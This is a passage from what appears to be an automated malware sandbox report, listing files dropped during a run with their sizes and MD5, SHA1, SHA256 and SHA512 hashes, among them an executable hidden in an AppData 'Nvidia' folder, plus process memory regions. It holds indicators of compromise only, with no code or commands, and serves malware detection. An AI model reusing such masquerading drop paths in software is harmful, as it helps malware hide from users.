          d6b4ddf57fac663a7a70f8d83b67fa801c62b2b9944e627dd946c6cb71c828df4577b3645c1df575cc5e5c8d5dbc08c139edcd20cf2c6f08073238d2ee288cc5

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          20b157d9eaf2636a1e3c9b4437e1d433

          SHA1

          f53c82a58b2b67568a1e749ffa2cc9d465a4f6d7

          SHA256

          ea4e3622546c56be93d968c71927264ec324d6c0f7734eaca4846ed8f35e4db6

          SHA512

          51eb58f18c9c0582f18009f4c277a74cb32206279a5f3a45b11a84549d6b2c8db7a274f5f726247016043bfe3b6d99fbd9190b4f5cebc417f4ba5d44d90373cb

        • C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe

          Filesize

          530KB

          MD5

          862e7aeb18ba5892f51b5712a213a614

          SHA1

          99d86e4247f52c3ea9b2bb476af66dfc7707fa8d

          SHA256

          44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31

          SHA512

          678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713

        • C:\Users\Admin\AppData\Local\Temp\Cab7996.tmp

          Filesize

          61KB

          MD5

          f3441b8572aae8801c04f3060b550443

          SHA1

          4ef0a35436125d6821831ef36c28ffaf196cda15

          SHA256

          6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

          SHA512

          5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

        • C:\Users\Admin\AppData\Local\Temp\Tar79B8.tmp

          Filesize

          163KB

          MD5

          9441737383d21192400eca82fda910ec

          SHA1

          725e0d606a4fc9ba44aa8ffde65bed15e65367e4

          SHA256

          bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

          SHA512

          7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

        • C:\Users\Admin\AppData\Local\gzrj1xdnai\port.dat

          Filesize

          4B

          MD5

          5460b9ea1986ec386cb64df22dff37be

          SHA1

          f0d3a40df85181963127fe7f43181d78cc478fbc

          SHA256

          7263af08814e11782e313d81492e2c644c3152b0f42deeff9c0efa80667b5094

          SHA512

          8816afaa6e093847d81322fbaccb1e85313da2910750a2416dccf735651ec78f703ff37ff5b5e597fda56ae8fd905aa5c4a3c3090768c606c5d67b9787c4712a

        • memory/2400-171-0x000000001B440000-0x000000001B4C0000-memory.dmp

          Filesize

          512KB

        • memory/2400-169-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

          Filesize

          9.9MB

        • memory/2400-199-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

          Filesize

          9.9MB

        • memory/2400-200-0x000000001B440000-0x000000001B4C0000-memory.dmp

          Filesize

          512KB

        • memory/2552-5-0x000007FEF5990000-0x000007FEF637C000-memory.dmp

          Filesize

          9.9MB

        • memory/2552-0-0x0000000000DA0000-0x0000000000E2A000-memory.dmp

          Filesize

          552KB

        • memory/2552-2-0x000000001B0C0000-0x000000001B140000-memory.dmp

          Filesize

          512KB

        • memory/2552-1-0x000007FEF5990000-0x000007FEF637C000-memory.dmp

          Filesize

          9.9MB

        • memory/2808-11-0x000000001B310000-0x000000001B390000-memory.dmp

          Filesize

          512KB

        • memory/2808-10-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

          Filesize

          9.9MB

        • memory/2808-9-0x0000000001100000-0x000000000118A000-memory.dmp

          Filesize

          552KB

        • memory/2808-170-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp

          Filesize

          9.9MB

        • memory/2808-173-0x000000001B310000-0x000000001B390000-memory.dmp

          Filesize

          512KB
